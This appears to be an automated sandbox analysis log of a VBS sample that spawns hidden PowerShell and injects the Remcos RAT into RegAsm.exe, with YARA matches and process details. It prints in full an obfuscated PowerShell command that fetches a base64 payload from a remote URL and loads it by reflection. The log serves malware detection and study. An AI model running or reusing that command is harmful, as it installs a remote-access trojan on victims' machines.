                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
                  Source: 5fKvwnCAeC.vbs | Initial sample: Strings found which are bigger than 50
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@8/6@1/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sedqkmkm.5pl.ps1
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 5fKvwnCAeC.vbs | Virustotal: Detection: 9%
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Binary string: System.Data.Linq.pdb | source: powershell.exe, 0000000A.00000002.1404922826.0000026F3E840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp

